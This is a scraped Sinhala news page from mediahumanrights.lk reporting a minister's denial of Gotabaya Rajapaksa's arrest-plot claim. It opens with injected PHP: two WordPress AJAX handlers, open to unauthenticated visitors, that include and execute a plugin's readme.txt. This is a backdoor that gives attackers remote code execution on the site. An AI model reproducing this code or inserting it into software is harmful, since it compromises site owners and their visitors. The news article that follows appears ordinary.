if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } "මේකේ අවසානය තමයි දැන් මේ ක්‍රියාත්මක වෙන්නේ" - ඇමති අමරවීර ගෝඨා අත්අඩංගුවට ගැනීමේ කතාව ගැන කතා කරයි (VIDEO) - mediahumanrights.lk
mediahumanrights.lk
News Political

"මේකේ අවසානය තමයි දැන් මේ ක්‍රියාත්මක වෙන්නේ" – ඇමති අමරවීර ගෝඨා අත්අඩංගුවට ගැනීමේ කතාව ගැන කතා කරයි (VIDEO)

ශ්‍රී ලංකා නිදහස් පක්ෂයේ  මන්ත්‍රීවරුන්ට ගෝඨාභය  රාජපක්ෂව මාසයක් ඇතුළත අත්අඩංගුවට ගන්නා ලෙස ප්‍රකාශයක් කළ  බව පවසමින් හිටපු ආරක්ෂක ලේකම්වරයා  ඊයේ(07) මහනුවරදී කළ ප්‍රකාශය තුළ කිසිදු සත්‍යතාවයක් නොමැති බව  අමාත්‍ය  මහින්ද අමරවීර පවසනවා.
අමාත්‍යවරයා  මේ බව ප්‍රකාශ කර සිටියේ අද (08)පෙරවරුවේ සිය නිවසේදී විශේෂ මාධ්‍ය හමුවක් කැඳවමින්.
මෙහිදී වැඩිදුරටත් අදහස් පළ කළ අමාත්‍ය  මහින්ද අමරවීර  මෙසේ සඳහන් කළා.
”මම කනගාටුවෙනවා එතුමා ඒ වගේ ප්‍රකාශයක් සිදුකිරීම පිළිබඳ. ඒ නිසා මම ඊයේ (07)රාත්‍රී දුරකථන ඇමතුමකින් විමසීමක් කළා මේ වගේ දෙයක් කියන්න ලැබුණු තොරතුර පිළිබඳව.
එතුමා මට කිවුවේ රාජපක්ෂ පවුලේ තවත් සාමාජිකයෙකුහට ලැබුණු තොරතුරකට අනුව ඔහුට කළ  දැනුම් දීම මත තමයි මේ වගේ ප්‍රකාශයක් කළේ  කියලා.
ගෝඨාභය රාජපක්ෂ  ආරක්ෂක ලේකම්වරයෙකු ලෙස විශාල කාර්යක් පසුගිය යුද්ධයේදී  සිදුකළා.
මේ පදනම් විරහිත චෝදනා එන්න පටන් ගත්තේ ජනාධිපතිතුමා මා වැඩ බාරගත් දවසේම අගය කරමින් කළ  ප්‍රකාශයත් සමගයි. එනිසා බොහෝ සිත රිදුනු මිනිස්සු ඉන්න බව මම දන්නවා. මේ පසුගිය ටිකේම චරිත ඝාතන ෆේෂ්බුක් හරහා මාධ්‍ය හරහා විවධ අවලාද චෝදනා නගමින් ආවා. මේකේ අවසානය තමයි දැන් මේ ක්‍රියාත්මක වෙන්නේ ”
මේ සම්බන්ධයෙන් අමාත්‍යවරයාගේ ප්‍රකාශය සවිස්තරාත්මකව පහතින් නැරඹිය හැකියි.
(under the courtesy of nethfm news web)

Related posts

පාර්ලිමේන්තුව තියෙන්නෙ අපේ පැවැත්මට නෙවෙයි, ජනතාවගේ පැවැත්මට – ලක්ෂ්මන් යාපා

Shiran Viraj

ඇමරිකාව කොරෝනා ආසාදිතයන් මිලියනය පනී.. මරණ 56,000 පනී..

Shiran Viraj

මැති ඇමති ඉන්ධන දීමනාව ඉහලට..

Shiran Viraj